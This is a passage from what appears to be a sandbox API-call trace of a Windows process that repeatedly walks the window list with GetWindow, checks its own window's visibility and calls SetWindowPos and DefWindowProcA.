(hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.628] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.628] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.628] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.628] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.628] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.628] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.628] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.628] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.628] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.628] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.628] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.628] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.628] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.628] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.628] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.628] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.628] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.628] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.628] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.628] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.628] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.628] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.629] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.629] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.629] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.629] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.629] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.629] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.629] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.629] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.629] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.629] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.629] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.629] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.629] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.629] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.629] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.629] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.629] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.629] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.629] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.629] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.629] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.629] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.629] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.629] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.629] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.630] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.630] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.630] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.630] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.630] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.630] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.630] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.630] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.630] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.630] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.630] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.630] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.630] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.630] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.630] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.630] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.630] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.630] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.630] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.630] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.630] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.630] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.630] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.630] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.630] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.631] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.631] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.631] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.631] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.631] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.631] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.631] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.631] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.631] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.631] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.631] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.631] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.631] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.631] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.631] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.631] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.631] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.631] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.631] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.631] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.631] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.631] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.632] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.632] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.632] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.632] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.632] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.632] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.632] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.632] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.632] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.632] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.632] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.632] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.632] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.632] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.632] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.632] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.632] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.632] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.632] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.632] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.632] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.632] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.632] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.632] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.632] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.632] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.632] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.632] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.632] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.632] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.632] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.632] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.632] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.633] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.633] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.633] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.633] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.633] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.633] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.633] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.633] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.633] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.633] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.633] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.633] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.633] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.633] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.633] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.633] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.633] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.633] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.633] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.633] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.633] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.633] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.633] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.633] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.633] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.633] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.633] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.633] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.633] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.633] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.633] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.634] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.634] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.634] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.634] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.634] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.634] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.634] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.634] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.634] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.634] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.634] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.634] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.634] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.634] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.634] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.634] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.634] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.634] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.634] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.634] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.634] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.634] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.634] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.634] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.634] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.634] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.634] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.634] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.634] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.634] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.634] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.634] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.635] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.635] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.635] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.635] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.635] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.635] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.635] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.635] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.635] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.635] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.635] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.635] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.635] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.635] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.635] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.635] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.635] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.635] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.635] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.635] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.635] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.635] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.635] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.635] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.635] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.635] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.635] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.635] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.635] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.635] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.635] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.636] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.636] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.636] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.636] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.636] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.636] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.636] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.636] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.636] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.636] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.636] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.636] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.636] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.636] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.636] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.636] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.636] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.636] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.636] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.636] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.636] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.636] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.636] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.636] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.636] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.636] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.636] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.636] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.636] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.636] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.637] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.637] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.637] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.637] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.637] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.637] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.637] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.637] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.637] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.637] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.637] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.637] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.637] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.637] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.637] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.637] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.637] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.637] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.637] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.637] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.637] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.637] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.637] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.637] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.637] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.638] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.638] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.638] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.638] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.638] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.638] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.638] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.638] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.638] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.638] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.638] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.638] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.638] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.638] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.638] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.638] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.638] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.638] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.638] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.638] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.638] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.638] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.638] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.638] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.638] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.639] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.639] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.639] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.639] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.639] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.639] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.639] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.639] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.639] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.639] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.639] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.639] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.639] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.639] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.639] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.639] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.639] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.639] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.639] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.639] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.639] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.639] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.639] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.639] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.639] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.639] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.640] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.640] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.640] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.640] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.640] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.640] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.640] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.640] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.640] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.640] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.640] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.640] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.640] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.640] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.640] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.640] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.640] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.640] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.640] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.640] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.640] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.640] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.640] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.641] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.641] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.641] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.641] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.641] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.641] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.641] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.641] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.641] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.641] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.641] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.641] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.641] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.641] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.641] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.641] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.641] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.641] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.641] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.641] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.641] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.641] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.641] 